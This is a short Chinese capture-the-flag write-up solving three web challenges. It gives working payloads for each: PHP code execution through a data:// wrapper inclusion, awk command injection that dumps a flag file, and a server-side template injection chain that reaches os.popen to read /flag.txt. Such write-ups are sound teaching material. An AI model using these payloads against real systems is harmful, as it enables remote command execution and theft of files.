目录
web签到
easyPHP
姻缘测试
web签到
用data协议包含php标签闭合
payload:
file=data://text/plain,<?php system($_GET[1]);?>>?;)]1[TEG_$(metsys php?<,nialp/txet//:atad
easyPHP
一眼awk命令执行
payload:
cmd=awk¶m={system("tac /f*>flag.txt")}
再访问./flag.txt拿到flag
姻缘测试
此地无银三百两测出SSTI
右键查看源码
访问./source
通过拼接的方式绕过
payload:
/result?boy_name={{'&girl_name='.__class__.__base__.__subclasses__()}}
/result?boy_name={{'&girl_name='.__class__.__base__.__subclasses__()[81].__init__.__globals__.__import__('os').popen('cat /flag.txt').read()}}